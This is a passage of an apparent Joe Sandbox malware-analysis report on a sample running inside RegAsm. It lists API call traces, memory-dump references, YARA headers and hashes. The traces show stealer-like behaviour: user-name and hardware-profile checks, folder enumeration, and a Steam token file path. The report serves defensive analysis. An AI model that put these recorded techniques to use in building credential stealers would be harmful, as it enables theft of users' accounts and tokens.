                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2098570390-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,vk@,?,?,?,?,00406B76,?,?,?,?,00000000), ref: 00406A95
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                  • String ID: vk@
                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-1609055756
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: .kB
                                                                                                                                                                                                                                                                                                  • API String ID: 1699248803-3544784936
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                  • String ID: *@
                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-721074590
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                                                  • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00427383,?,00000000,004225D0,000000FF,?,00418244,?), ref: 004155C7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 004155DF
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID: @<A
                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-4260584491
                                                                                                                                                                                                                                                                                                  • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca1a9253186f1b5ee703eb257632d364ba5c8053fd628161870718111730db74
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF05C3A3007111783120B9D88405A7F79EFFC6E11704012BDB68CB3A4C931DC4042E0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040822B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040823F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                                                  • Instruction ID: ea5c140e8df150c45b94e9dcb21e72039a34b19554562d26b54438b66e46b29d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24B17C70801248EACB14EBA4D951BEDBBB9AF19304F54417EE506732D2DB786B0CC765
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00417867
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571E40), ref: 00417886
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,0156F8D8), ref: 004176A3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 153043497-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406B2E,00000000), ref: 004066CF
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406B2E,00000000), ref: 00406703
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C806CCC
                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D11
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C806D26
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C806D35
                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D53
                                                                                                                                                                                                                                                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C806D73
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C806D80
                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32 ref: 6C806DC0
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C806DDC
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806DEB
                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C806DFF
                                                                                                                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C806E10
                                                                                                                                                                                                                                                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C806E27
                                                                                                                                                                                                                                                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C806E34
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C806EF9
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C806F7D
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806F8C
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C80709D
                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C807103
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C807153
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C807176
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C807209
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80723A
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80726B
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80729C
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C8072DC
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80730D
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8073C2
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8073F3
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8073FF
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C807406
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C80740D
                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C80741A
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C80755A
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C807568
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C807585
                                                                                                                                                                                                                                                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C807598
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C8075AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8064DF
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8064F2
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C806505
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C806518
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80652B
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C80671C
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C806724
                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C80672F
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C806759
                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C806764
                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C806A80
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C806ABE
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C806AD3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AE8
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AF7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                                                                                                                                                                  • Instruction ID: a864e295928d444ea4a0c4d01a5dc763abc6abcbf106edac1fe00cd438ac9755
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F1F470A056299FDB30DF24CE48B9AB7B5AF46318F1446A9DC09A7741E731AEC4CF90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041716E
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417175
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041718E
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004171A5
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276BC), ref: 004171DC
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276C0), ref: 004171F2
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00417210
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00417268
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00417277
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 0041729B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571980), ref: 004172AF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 004172B9
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 004172C7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
